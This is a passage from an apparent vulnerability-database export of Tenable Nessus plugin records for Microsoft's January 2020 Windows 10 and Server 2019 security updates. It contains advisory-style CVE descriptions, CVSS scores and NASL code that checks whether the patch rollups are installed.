Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0638", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0624", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0636", "CVE-2020-0631", "CVE-2020-0616", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4528760.NASL", "href": "https://www.tenable.com/plugins/nessus/132857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132857);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0624\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0636\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4528760\");\n script_xref(name:\"MSFT\", value:\"MS20-4528760\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. 
A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4528760/windows-10-update-kb4528760\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?027d37ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4528760.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4528760');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:47", "description": "The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. 
This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. 
The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0609", "CVE-2020-0638", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0616", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534273.NASL", "href": "https://www.tenable.com/plugins/nessus/132859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132859);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534273\");\n script_xref(name:\"MSFT\", value:\"MS20-4534273\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. 
An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. 
The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\");\n # https://support.microsoft.com/en-us/help/4534273/windows-10-update-kb4534273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a22c8c16\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534273.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is 
